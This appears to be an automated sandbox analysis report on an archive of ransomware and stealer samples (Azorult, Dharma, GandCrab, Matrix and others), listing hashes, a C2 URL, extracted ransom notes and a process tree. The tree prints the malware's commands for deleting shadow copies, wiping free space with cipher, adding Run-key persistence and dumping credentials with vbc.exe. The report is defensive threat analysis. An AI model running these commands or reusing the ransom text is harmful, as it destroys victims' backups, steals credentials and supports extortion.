Analysis

  • max time kernel
    169s
  • max time network
    216s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    07-11-2024 16:46

Errors

Reason
Machine shutdown

General

  • Target

    RNSM00361.7z

  • Size

    22.0MB

  • MD5

    178c5959b76748b2dc7b8375d12db80e

  • SHA1

    f292fe20d20524d7d9ac5658f35c4b85bea72112

  • SHA256

    f526608a5b27e9f3b290011efc5ed2098a48cbb522d15f7788dcda4158a23f49

  • SHA512

    9dc3274909bb0d6a39da8008d9c72ded281581f8ceab4e667670cf8e29fe5fca173ea7a2f53d1a34effeceac0105029202f83d83a1ecb1a548009aa81c4f18c0

  • SSDEEP

    393216:uM1EMy1RIPjtv22c20MTko/jMbyQ4kFnsMXzoBzapYxt3Ld:uQPyPI5vvc2ZuQkqMM9a+h

Malware Config

Extracted

Family

azorult

C2

http://admin.svapofit.com/azs/index.php

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Office14\1033\#Decrypt_Files_ReadMe#.rtf

Ransom Note
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Extracted

Path

C:\Users\Admin\Documents\!HELP_SOS.hta

Ransom Note

Extracted

Path

C:\Program Files (x86)\Adobe\Reader 9.0\Esl\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT

Ransom Note
__________________________________________________________________________________________________
| |
| *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS *** |
|__________________________________________________________________________________________________|

Your files are now encrypted!

-----BEGIN PERSONAL IDENTIFIER-----
+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1O
UZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeI
KZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6
VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC
8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA
-----END PERSONAL IDENTIFIER-----

Your important documents, databases, documents, network folders are encrypted for your PC security problems.
No data from your computer has been stolen or deleted.
Follow the instructions to restore the files.

How to get the automatic decryptor:
1) Contact us by e-mail: [email protected]. In the letter, indicate your personal identifier (look at the beginning of this document) and the external ip-address of the computer on which the encrypted files are located.
2) After answering your request, our operator will give you further instructions that will show what to do next (the answer you will receive as soon as possible)
** Second email address [email protected]

Free decryption as guarantee!
Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 5Mb (non archived), and files should not contain valuable information (databases, backups, large excel sheets, etc.).

__________________________________________________________________________________________________
| |
| How to obtain Bitcoins? |
| |
| * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click |
| 'Buy bitcoins', and select the seller by payment method and price: |
| https://localbitcoins.com/buy_bitcoins |
| * Also you can find other places to buy Bitcoins and beginners guide here: |
| http://www.coindesk.com/information/how-can-i-buy-bitcoins |
| |
|__________________________________________________________________________________________________|
__________________________________________________________________________________________________
| |
| Attention! |
| |
| * Do not rename encrypted files. |
| * Do not try to decrypt your data using third party software, it may cause permanent data loss. |
| * Decryption of your files with the help of third parties may cause increased price |
| (they add their fee to our) or you can become a victim of a scam. |
| |
|__________________________________________________________________________________________________|

Extracted

Path

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\storage\[HOW_TO_DECRYPT_FILES].html

Ransom Note

Extracted

Path

C:\ProgramData\Adobe\Updater6\!HELP_SOS.hta

Ransom Note
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Extracted

Path

C:\XK\Restore-My-Files.txt

Ransom Note
All your files are Encrypted!
For data recovery needs decryptor.
How to buy decryptor:
----------------------------------------------------------------------------------------
| 1. Download Tor browser - https://www.torproject.org/ and install it.
| 2. Open link in TOR browser - hhttp://alcx6zctcmhmn3kx.onion/
| 3. Follow the instructions on this page
----------------------------------------------------------------------------------------
Note! This link is available via "Tor Browser" only.
------------------------------------------------------------
Free decryption as guarantee.
Before paying you can send us 2 file for free decryption.
------------------------------------------------------------
alternate address - http://dtutgqjuzv7sktgl.onion/
DO NOT CHANGE DATA BELOW
###h7dlrwhrvtghr###
URLs

http://dtutgqjuzv7sktgl.onion/

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Dharma

    Dharma is a ransomware that uses security software installation to hide malicious activities.

  • Dharma family
  • GandCrab payload 3 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

  • Gandcrab family
  • GlobeImposter

    GlobeImposter is a ransomware first seen in 2017.

  • Globeimposter family
  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Hawkeye family
  • Matrix Ransomware 2 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Matrix family
  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • Windows security bypass 2 TTPs 6 IoCs
  • Contacts a large (7734) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (292) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (8764) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 1 IoCs
  • Disables RegEdit via registry modification 2 IoCs
  • Disables use of System Restore points 1 TTPs
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies system executable filetype association 2 TTPs 13 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 20 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Drops file in System32 directory 64 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 5 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 60 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 9 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 17 IoCs
  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 12 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: RenamesItself 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of UnmapMainImage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 12 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00361.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2756
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2312
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe
      Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2040
      • C:\Windows\SysWOW64\Rundll32.exe
        "C:\Windows\System32\Rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\IconCache.db",StartUpdate
        3⤵
          PID:408
      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe
        Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe
        2⤵
        • Modifies WinLogon for persistence
        • Modifies visibility of file extensions in Explorer
        • Modifies visiblity of hidden/system files in Explorer
        • Disables RegEdit via registry modification
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system executable filetype association
        • Adds Run key to start application
        • Drops desktop.ini file(s)
        • Enumerates connected drives
        • Modifies Control Panel
        • Modifies registry class
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • System policy modification
        PID:2888
        • C:\Windows\xk.exe
          C:\Windows\xk.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2684
        • C:\Windows\SysWOW64\IExplorer.exe
          C:\Windows\system32\IExplorer.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:3784
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:4220
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:4216
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:4960
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:2944
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:4672
        • C:\Windows\xk.exe
          C:\Windows\xk.exe
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:5096
        • C:\Windows\SysWOW64\IExplorer.exe
          C:\Windows\system32\IExplorer.exe
          3⤵
          • Suspicious use of SetWindowsHookEx
          PID:5452
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
          3⤵
          • Suspicious use of SetWindowsHookEx
          PID:6956
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
          3⤵
          • Suspicious use of SetWindowsHookEx
          PID:4044
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
          3⤵
            PID:1920
          • C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
            "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
            3⤵
              PID:4308
            • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
              "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
              3⤵
                PID:3624
            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe
              Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe
              2⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious use of SetWindowsHookEx
              PID:540
              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe
                Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe
                3⤵
                • Executes dropped EXE
                PID:3928
            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe
              Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe
              2⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              PID:2900
            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe
              Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe
              2⤵
              • Executes dropped EXE
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              PID:2936
            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe
              Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe
              2⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious use of SetWindowsHookEx
              PID:484
              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe
                rojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of UnmapMainImage
                PID:4600
                • C:\Users\Admin\AppData\Roaming\Windows Update.exe
                  "C:\Users\Admin\AppData\Roaming\Windows Update.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of SetWindowsHookEx
                  PID:3112
                  • C:\Users\Admin\AppData\Roaming\Windows Update.exe
                    C:\Users\Admin\AppData\Roaming\Windows Update.exe"
                    5⤵
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of UnmapMainImage
                    PID:6848
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
                      6⤵
                        PID:5364
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
                        6⤵
                          PID:7440
                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe
                  Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe
                  2⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Adds Run key to start application
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1928
                  • C:\Windows\405066960303840\winsvcs.exe
                    C:\Windows\405066960303840\winsvcs.exe
                    3⤵
                    • Modifies Windows Defender Real-time Protection settings
                    • Windows security bypass
                    • Executes dropped EXE
                    • Windows security modification
                    PID:4156
                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe
                  Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe
                  2⤵
                  • Drops startup file
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops desktop.ini file(s)
                  • Drops file in Program Files directory
                  • Modifies registry class
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2028
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe"
                    3⤵
                      PID:1876
                      • C:\Windows\system32\mode.com
                        mode con cp select=1251
                        4⤵
                          PID:1400
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin delete shadows /all /quiet
                          4⤵
                          • Interacts with shadow copies
                          PID:1640
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe"
                        3⤵
                          PID:3400
                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe
                        Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:1940
                        • C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe
                          "C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe"
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in System32 directory
                          • Drops file in Windows directory
                          • Suspicious behavior: RenamesItself
                          PID:2672
                          • C:\Windows\SysWOW64\shell.exe
                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Local\Temp\EJQTK.bat"
                            4⤵
                              PID:8152
                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe
                          Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          • Suspicious use of SetWindowsHookEx
                          PID:1828
                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe
                            rojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe
                            3⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops desktop.ini file(s)
                            • Drops file in Program Files directory
                            • Suspicious behavior: RenamesItself
                            PID:1288
                            • C:\Windows\SysWOW64\shell.exe
                              "C:\Windows\system32\shell.exe" "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe > nul
                              4⤵
                                PID:3780
                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exe
                            Trojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exe
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Adds Run key to start application
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1260
                            • C:\Users\Admin\AppData\Local\Microsoft\msconfig.exe
                              C:\Users\Admin\AppData\Local\Microsoft\msconfig.exe
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • System Location Discovery: System Language Discovery
                              PID:448
                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe
                            Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1648
                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe
                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:4764
                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe
                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe"
                              3⤵
                              • Executes dropped EXE
                              • Maps connected drives based on registry
                              • Suspicious behavior: MapViewOfSection
                              PID:3468
                              • C:\Windows\SysWOW64\explorer.exe
                                explorer.exe
                                4⤵
                                • Adds Run key to start application
                                PID:4484
                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe
                            Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe
                            2⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Modifies system certificate store
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:2116
                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe
                            Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe
                            2⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Modifies system certificate store
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1652
                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                              "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3800
                            • C:\Users\Admin\AppData\Roaming\Buomf\otheo.exe
                              "C:\Users\Admin\AppData\Roaming\Buomf\otheo.exe"
                              3⤵
                              • Checks computer location settings
                              • Adds Run key to start application
                              • Sets desktop wallpaper using registry
                              • Modifies registry class
                              PID:4968
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html
                                4⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of SetWindowsHookEx
                                PID:3192
                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3192 CREDAT:275457 /prefetch:2
                                  5⤵
                                  • Drops desktop.ini file(s)
                                  • Modifies Internet Explorer settings
                                  PID:6080
                              • C:\Windows\SysWOW64\shell.exe
                                "C:\Windows\system32\shell.exe" "C:\Windows\System32\cipher.exe" /W:C
                                4⤵
                                • Suspicious use of SetWindowsHookEx
                                PID:2092
                              • C:\Windows\SysWOW64\shell.exe
                                "C:\Windows\system32\shell.exe" "C:\Windows\System32\cipher.exe" /W:F
                                4⤵
                                • Suspicious use of SetWindowsHookEx
                                PID:6556
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_5a59414b.bat"
                                4⤵
                                  PID:2244
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_72a44b2a.bat"
                                  4⤵
                                    PID:4288
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_b485b959.bat"
                                  3⤵
                                    PID:5832
                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe
                                  Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Enumerates connected drives
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  PID:1988
                                  • C:\Users\Admin\Desktop\00361\2aua0mwa.exe
                                    "C:\Users\Admin\Desktop\00361\2aua0mwa.exe" -n
                                    3⤵
                                    • Executes dropped EXE
                                    PID:1852
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /C reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v README /t REG_SZ /d "\"%ProgramFiles%\Windows NT\Accessories\wordpad.exe\" \"C:\Users\Admin\AppData\Roaming\#Decrypt_Files_ReadMe#.rtf"" /f & WMIC.exe shadowcopy delete /nointeractive & vssadmin.exe delete shadows /all /quiet
                                    3⤵
                                      PID:4344
